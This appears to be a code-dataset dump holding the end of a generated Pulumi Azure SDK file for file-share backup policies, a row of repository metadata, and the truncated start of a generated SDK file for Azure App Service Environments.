:param pulumi.Input[str] name: Specifies the name of the policy. Changing this forces a new resource to be created.
:param pulumi.Input[str] recovery_vault_name: Specifies the name of the Recovery Services Vault to use. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the policy. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['PolicyFileShareRetentionDailyArgs']] retention_daily: Configures the policy daily retention as documented in the `retention_daily` block below.
:param pulumi.Input[pulumi.InputType['PolicyFileShareRetentionMonthlyArgs']] retention_monthly: Configures the policy monthly retention as documented in the `retention_monthly` block below.
:param pulumi.Input[pulumi.InputType['PolicyFileShareRetentionWeeklyArgs']] retention_weekly: Configures the policy weekly retention as documented in the `retention_weekly` block below.
:param pulumi.Input[pulumi.InputType['PolicyFileShareRetentionYearlyArgs']] retention_yearly: Configures the policy yearly retention as documented in the `retention_yearly` block below.
:param pulumi.Input[str] timezone: Specifies the timezone. [the possible values are defined here](http://jackstromberg.com/2017/01/list-of-time-zones-consumed-by-azure/). Defaults to `UTC`
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PolicyFileShareArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an Azure File Share Backup Policy within a Recovery Services vault.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_vault = azure.recoveryservices.Vault("exampleVault",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku="Standard")
policy = azure.backup.PolicyFileShare("policy",
resource_group_name=example_resource_group.name,
recovery_vault_name=azurerm_recovery_services_vault["vault"]["name"],
timezone="UTC",
backup=azure.backup.PolicyFileShareBackupArgs(
frequency="Daily",
time="23:00",
),
retention_daily=azure.backup.PolicyFileShareRetentionDailyArgs(
count=10,
),
retention_weekly=azure.backup.PolicyFileShareRetentionWeeklyArgs(
count=7,
weekdays=[
"Sunday",
"Wednesday",
"Friday",
"Saturday",
],
),
retention_monthly=azure.backup.PolicyFileShareRetentionMonthlyArgs(
count=7,
weekdays=[
"Sunday",
"Wednesday",
],
weeks=[
"First",
"Last",
],
),
retention_yearly=azure.backup.PolicyFileShareRetentionYearlyArgs(
count=7,
weekdays=["Sunday"],
weeks=["Last"],
months=["January"],
))
```
## Import
Azure File Share Backup Policies can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:backup/policyFileShare:PolicyFileShare policy1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.RecoveryServices/vaults/example-recovery-vault/backupPolicies/policy1
```
:param str resource_name: The name of the resource.
:param PolicyFileShareArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PolicyFileShareArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
backup: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareBackupArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
recovery_vault_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
retention_daily: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionDailyArgs']]] = None,
retention_monthly: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionMonthlyArgs']]] = None,
retention_weekly: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionWeeklyArgs']]] = None,
retention_yearly: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionYearlyArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
timezone: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PolicyFileShareArgs.__new__(PolicyFileShareArgs)
if backup is None and not opts.urn:
raise TypeError("Missing required property 'backup'")
__props__.__dict__["backup"] = backup
__props__.__dict__["name"] = name
if recovery_vault_name is None and not opts.urn:
raise TypeError("Missing required property 'recovery_vault_name'")
__props__.__dict__["recovery_vault_name"] = recovery_vault_name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if retention_daily is None and not opts.urn:
raise TypeError("Missing required property 'retention_daily'")
__props__.__dict__["retention_daily"] = retention_daily
__props__.__dict__["retention_monthly"] = retention_monthly
__props__.__dict__["retention_weekly"] = retention_weekly
__props__.__dict__["retention_yearly"] = retention_yearly
__props__.__dict__["tags"] = tags
__props__.__dict__["timezone"] = timezone
super(PolicyFileShare, __self__).__init__(
'azure:backup/policyFileShare:PolicyFileShare',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
backup: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareBackupArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
recovery_vault_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
retention_daily: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionDailyArgs']]] = None,
retention_monthly: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionMonthlyArgs']]] = None,
retention_weekly: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionWeeklyArgs']]] = None,
retention_yearly: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionYearlyArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
timezone: Optional[pulumi.Input[str]] = None) -> 'PolicyFileShare':
"""
Get an existing PolicyFileShare resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['PolicyFileShareBackupArgs']] backup: Configures the Policy backup frequency and times as documented in the `backup` block below.
:param pulumi.Input[str] name: Specifies the name of the policy. Changing this forces a new resource to be created.
:param pulumi.Input[str] recovery_vault_name: Specifies the name of the Recovery Services Vault to use. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the policy. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['PolicyFileShareRetentionDailyArgs']] retention_daily: Configures the policy daily retention as documented in the `retention_daily` block below.
:param pulumi.Input[pulumi.InputType['PolicyFileShareRetentionMonthlyArgs']] retention_monthly: Configures the policy monthly retention as documented in the `retention_monthly` block below.
:param pulumi.Input[pulumi.InputType['PolicyFileShareRetentionWeeklyArgs']] retention_weekly: Configures the policy weekly retention as documented in the `retention_weekly` block below.
:param pulumi.Input[pulumi.InputType['PolicyFileShareRetentionYearlyArgs']] retention_yearly: Configures the policy yearly retention as documented in the `retention_yearly` block below.
:param pulumi.Input[str] timezone: Specifies the timezone. [the possible values are defined here](http://jackstromberg.com/2017/01/list-of-time-zones-consumed-by-azure/). Defaults to `UTC`
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _PolicyFileShareState.__new__(_PolicyFileShareState)
__props__.__dict__["backup"] = backup
__props__.__dict__["name"] = name
__props__.__dict__["recovery_vault_name"] = recovery_vault_name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["retention_daily"] = retention_daily
__props__.__dict__["retention_monthly"] = retention_monthly
__props__.__dict__["retention_weekly"] = retention_weekly
__props__.__dict__["retention_yearly"] = retention_yearly
__props__.__dict__["tags"] = tags
__props__.__dict__["timezone"] = timezone
return PolicyFileShare(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def backup(self) -> pulumi.Output['outputs.PolicyFileShareBackup']:
"""
Configures the Policy backup frequency and times as documented in the `backup` block below.
"""
return pulumi.get(self, "backup")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the policy. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="recoveryVaultName")
def recovery_vault_name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Recovery Services Vault to use. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "recovery_vault_name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which to create the policy. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="retentionDaily")
def retention_daily(self) -> pulumi.Output['outputs.PolicyFileShareRetentionDaily']:
"""
Configures the policy daily retention as documented in the `retention_daily` block below.
"""
return pulumi.get(self, "retention_daily")
@property
@pulumi.getter(name="retentionMonthly")
def retention_monthly(self) -> pulumi.Output[Optional['outputs.PolicyFileShareRetentionMonthly']]:
"""
Configures the policy monthly retention as documented in the `retention_monthly` block below.
"""
return pulumi.get(self, "retention_monthly")
@property
@pulumi.getter(name="retentionWeekly")
def retention_weekly(self) -> pulumi.Output[Optional['outputs.PolicyFileShareRetentionWeekly']]:
"""
Configures the policy weekly retention as documented in the `retention_weekly` block below.
"""
return pulumi.get(self, "retention_weekly")
@property
@pulumi.getter(name="retentionYearly")
def retention_yearly(self) -> pulumi.Output[Optional['outputs.PolicyFileShareRetentionYearly']]:
"""
Configures the policy yearly retention as documented in the `retention_yearly` block below.
"""
return pulumi.get(self, "retention_yearly")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
return pulumi.get(self, "tags")
@property
@pulumi.getter
def timezone(self) -> pulumi.Output[Optional[str]]:
"""
Specifies the timezone. [the possible values are defined here](http://jackstromberg.com/2017/01/list-of-time-zones-consumed-by-azure/). Defaults to `UTC`
"""
return pulumi.get(self, "timezone")
| 50.591176
| 241
| 0.672781
| 3,660
| 34,402
| 6.128962
| 0.063661
| 0.068162
| 0.066066
| 0.026525
| 0.905492
| 0.892475
| 0.884629
| 0.874287
| 0.865148
| 0.84638
| 0
| 0.004949
| 0.230568
| 34,402
| 679
| 242
| 50.665685
| 0.842501
| 0.386082
| 0
| 0.756374
| 1
| 0
| 0.179748
| 0.089431
| 0
| 0
| 0
| 0
| 0
| 1
| 0.161473
| false
| 0.002833
| 0.01983
| 0.008499
| 0.27762
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
813f9a86840c786caa2576cc9ba00bb164f5ec41
| 40,752
|
py
|
Python
|
sdk/python/pulumi_azure/appservice/environment.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/appservice/environment.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/appservice/environment.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['EnvironmentArgs', 'Environment']
@pulumi.input_type
class EnvironmentArgs:
def __init__(__self__, *,
subnet_id: pulumi.Input[str],
allowed_user_ip_cidrs: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentClusterSettingArgs']]]] = None,
front_end_scale_factor: Optional[pulumi.Input[int]] = None,
internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
pricing_tier: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
user_whitelisted_ip_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Environment resource.
:param pulumi.Input[str] subnet_id: The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_user_ip_cidrs: Allowed user added IP ranges on the ASE database. Use the addresses you want to set as the explicit egress address ranges.
:param pulumi.Input[Sequence[pulumi.Input['EnvironmentClusterSettingArgs']]] cluster_settings: Zero or more `cluster_setting` blocks as defined below.
:param pulumi.Input[int] front_end_scale_factor: Scale factor for front end instances. Possible values are between `5` and `15`. Defaults to `15`.
:param pulumi.Input[str] internal_load_balancing_mode: Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None`, `Web`, `Publishing` and combined value `"Web, Publishing"`. Defaults to `None`.
:param pulumi.Input[str] name: The name of the App Service Environment. Changing this forces a new resource to be created.
:param pulumi.Input[str] pricing_tier: Pricing tier for the front end instances. Possible values are `I1`, `I2` and `I3`. Defaults to `I1`.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "subnet_id", subnet_id)
if allowed_user_ip_cidrs is not None:
pulumi.set(__self__, "allowed_user_ip_cidrs", allowed_user_ip_cidrs)
if cluster_settings is not None:
pulumi.set(__self__, "cluster_settings", cluster_settings)
if front_end_scale_factor is not None:
pulumi.set(__self__, "front_end_scale_factor", front_end_scale_factor)
if internal_load_balancing_mode is not None:
pulumi.set(__self__, "internal_load_balancing_mode", internal_load_balancing_mode)
if name is not None:
pulumi.set(__self__, "name", name)
if pricing_tier is not None:
pulumi.set(__self__, "pricing_tier", pricing_tier)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if user_whitelisted_ip_ranges is not None:
warnings.warn("""this property has been renamed to `allowed_user_ip_cidrs` better reflect the expected ip range format""", DeprecationWarning)
pulumi.log.warn("""user_whitelisted_ip_ranges is deprecated: this property has been renamed to `allowed_user_ip_cidrs` better reflect the expected ip range format""")
if user_whitelisted_ip_ranges is not None:
pulumi.set(__self__, "user_whitelisted_ip_ranges", user_whitelisted_ip_ranges)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> pulumi.Input[str]:
"""
The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: pulumi.Input[str]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="allowedUserIpCidrs")
def allowed_user_ip_cidrs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Allowed user added IP ranges on the ASE database. Use the addresses you want to set as the explicit egress address ranges.
"""
return pulumi.get(self, "allowed_user_ip_cidrs")
@allowed_user_ip_cidrs.setter
def allowed_user_ip_cidrs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "allowed_user_ip_cidrs", value)
@property
@pulumi.getter(name="clusterSettings")
def cluster_settings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentClusterSettingArgs']]]]:
"""
Zero or more `cluster_setting` blocks as defined below.
"""
return pulumi.get(self, "cluster_settings")
@cluster_settings.setter
def cluster_settings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentClusterSettingArgs']]]]):
pulumi.set(self, "cluster_settings", value)
@property
@pulumi.getter(name="frontEndScaleFactor")
def front_end_scale_factor(self) -> Optional[pulumi.Input[int]]:
"""
Scale factor for front end instances. Possible values are between `5` and `15`. Defaults to `15`.
"""
return pulumi.get(self, "front_end_scale_factor")
@front_end_scale_factor.setter
def front_end_scale_factor(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "front_end_scale_factor", value)
@property
@pulumi.getter(name="internalLoadBalancingMode")
def internal_load_balancing_mode(self) -> Optional[pulumi.Input[str]]:
"""
Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None`, `Web`, `Publishing` and combined value `"Web, Publishing"`. Defaults to `None`.
"""
return pulumi.get(self, "internal_load_balancing_mode")
@internal_load_balancing_mode.setter
def internal_load_balancing_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "internal_load_balancing_mode", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the App Service Environment. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="pricingTier")
def pricing_tier(self) -> Optional[pulumi.Input[str]]:
"""
Pricing tier for the front end instances. Possible values are `I1`, `I2` and `I3`. Defaults to `I1`.
"""
return pulumi.get(self, "pricing_tier")
@pricing_tier.setter
def pricing_tier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "pricing_tier", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="userWhitelistedIpRanges")
def user_whitelisted_ip_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "user_whitelisted_ip_ranges")
@user_whitelisted_ip_ranges.setter
def user_whitelisted_ip_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "user_whitelisted_ip_ranges", value)
@pulumi.input_type
class _EnvironmentState:
def __init__(__self__, *,
allowed_user_ip_cidrs: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentClusterSettingArgs']]]] = None,
front_end_scale_factor: Optional[pulumi.Input[int]] = None,
internal_ip_address: Optional[pulumi.Input[str]] = None,
internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
outbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
pricing_tier: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
service_ip_address: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
user_whitelisted_ip_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering Environment resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_user_ip_cidrs: Allowed user added IP ranges on the ASE database. Use the addresses you want to set as the explicit egress address ranges.
:param pulumi.Input[Sequence[pulumi.Input['EnvironmentClusterSettingArgs']]] cluster_settings: Zero or more `cluster_setting` blocks as defined below.
:param pulumi.Input[int] front_end_scale_factor: Scale factor for front end instances. Possible values are between `5` and `15`. Defaults to `15`.
:param pulumi.Input[str] internal_ip_address: IP address of internal load balancer of the App Service Environment.
:param pulumi.Input[str] internal_load_balancing_mode: Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None`, `Web`, `Publishing` and combined value `"Web, Publishing"`. Defaults to `None`.
:param pulumi.Input[str] location: The location where the App Service Environment exists.
:param pulumi.Input[str] name: The name of the App Service Environment. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] outbound_ip_addresses: List of outbound IP addresses of the App Service Environment.
:param pulumi.Input[str] pricing_tier: Pricing tier for the front end instances. Possible values are `I1`, `I2` and `I3`. Defaults to `I1`.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
:param pulumi.Input[str] service_ip_address: IP address of service endpoint of the App Service Environment.
:param pulumi.Input[str] subnet_id: The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
"""
if allowed_user_ip_cidrs is not None:
pulumi.set(__self__, "allowed_user_ip_cidrs", allowed_user_ip_cidrs)
if cluster_settings is not None:
pulumi.set(__self__, "cluster_settings", cluster_settings)
if front_end_scale_factor is not None:
pulumi.set(__self__, "front_end_scale_factor", front_end_scale_factor)
if internal_ip_address is not None:
pulumi.set(__self__, "internal_ip_address", internal_ip_address)
if internal_load_balancing_mode is not None:
pulumi.set(__self__, "internal_load_balancing_mode", internal_load_balancing_mode)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if outbound_ip_addresses is not None:
pulumi.set(__self__, "outbound_ip_addresses", outbound_ip_addresses)
if pricing_tier is not None:
pulumi.set(__self__, "pricing_tier", pricing_tier)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if service_ip_address is not None:
pulumi.set(__self__, "service_ip_address", service_ip_address)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if user_whitelisted_ip_ranges is not None:
warnings.warn("""this property has been renamed to `allowed_user_ip_cidrs` better reflect the expected ip range format""", DeprecationWarning)
pulumi.log.warn("""user_whitelisted_ip_ranges is deprecated: this property has been renamed to `allowed_user_ip_cidrs` better reflect the expected ip range format""")
if user_whitelisted_ip_ranges is not None:
pulumi.set(__self__, "user_whitelisted_ip_ranges", user_whitelisted_ip_ranges)
@property
@pulumi.getter(name="allowedUserIpCidrs")
def allowed_user_ip_cidrs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Allowed user added IP ranges on the ASE database. Use the addresses you want to set as the explicit egress address ranges.
"""
return pulumi.get(self, "allowed_user_ip_cidrs")
@allowed_user_ip_cidrs.setter
def allowed_user_ip_cidrs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "allowed_user_ip_cidrs", value)
@property
@pulumi.getter(name="clusterSettings")
def cluster_settings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentClusterSettingArgs']]]]:
"""
Zero or more `cluster_setting` blocks as defined below.
"""
return pulumi.get(self, "cluster_settings")
@cluster_settings.setter
def cluster_settings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentClusterSettingArgs']]]]):
pulumi.set(self, "cluster_settings", value)
@property
@pulumi.getter(name="frontEndScaleFactor")
def front_end_scale_factor(self) -> Optional[pulumi.Input[int]]:
"""
Scale factor for front end instances. Possible values are between `5` and `15`. Defaults to `15`.
"""
return pulumi.get(self, "front_end_scale_factor")
@front_end_scale_factor.setter
def front_end_scale_factor(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "front_end_scale_factor", value)
@property
@pulumi.getter(name="internalIpAddress")
def internal_ip_address(self) -> Optional[pulumi.Input[str]]:
"""
IP address of internal load balancer of the App Service Environment.
"""
return pulumi.get(self, "internal_ip_address")
@internal_ip_address.setter
def internal_ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "internal_ip_address", value)
@property
@pulumi.getter(name="internalLoadBalancingMode")
def internal_load_balancing_mode(self) -> Optional[pulumi.Input[str]]:
"""
Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None`, `Web`, `Publishing` and combined value `"Web, Publishing"`. Defaults to `None`.
"""
return pulumi.get(self, "internal_load_balancing_mode")
@internal_load_balancing_mode.setter
def internal_load_balancing_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "internal_load_balancing_mode", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The location where the App Service Environment exists.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the App Service Environment. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="outboundIpAddresses")
def outbound_ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of outbound IP addresses of the App Service Environment.
"""
return pulumi.get(self, "outbound_ip_addresses")
@outbound_ip_addresses.setter
def outbound_ip_addresses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "outbound_ip_addresses", value)
@property
@pulumi.getter(name="pricingTier")
def pricing_tier(self) -> Optional[pulumi.Input[str]]:
"""
Pricing tier for the front end instances. Possible values are `I1`, `I2` and `I3`. Defaults to `I1`.
"""
return pulumi.get(self, "pricing_tier")
@pricing_tier.setter
def pricing_tier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "pricing_tier", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="serviceIpAddress")
def service_ip_address(self) -> Optional[pulumi.Input[str]]:
"""
IP address of service endpoint of the App Service Environment.
"""
return pulumi.get(self, "service_ip_address")
@service_ip_address.setter
def service_ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_ip_address", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="userWhitelistedIpRanges")
def user_whitelisted_ip_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "user_whitelisted_ip_ranges")
@user_whitelisted_ip_ranges.setter
def user_whitelisted_ip_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "user_whitelisted_ip_ranges", value)
class Environment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
allowed_user_ip_cidrs: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentClusterSettingArgs']]]]] = None,
front_end_scale_factor: Optional[pulumi.Input[int]] = None,
internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
pricing_tier: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
user_whitelisted_ip_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages an App Service Environment.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_virtual_network = azure.network.VirtualNetwork("exampleVirtualNetwork",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
address_spaces=["10.0.0.0/16"])
ase = azure.network.Subnet("ase",
resource_group_name=example_resource_group.name,
virtual_network_name=example_virtual_network.name,
address_prefixes=["10.0.1.0/24"])
gateway = azure.network.Subnet("gateway",
resource_group_name=example_resource_group.name,
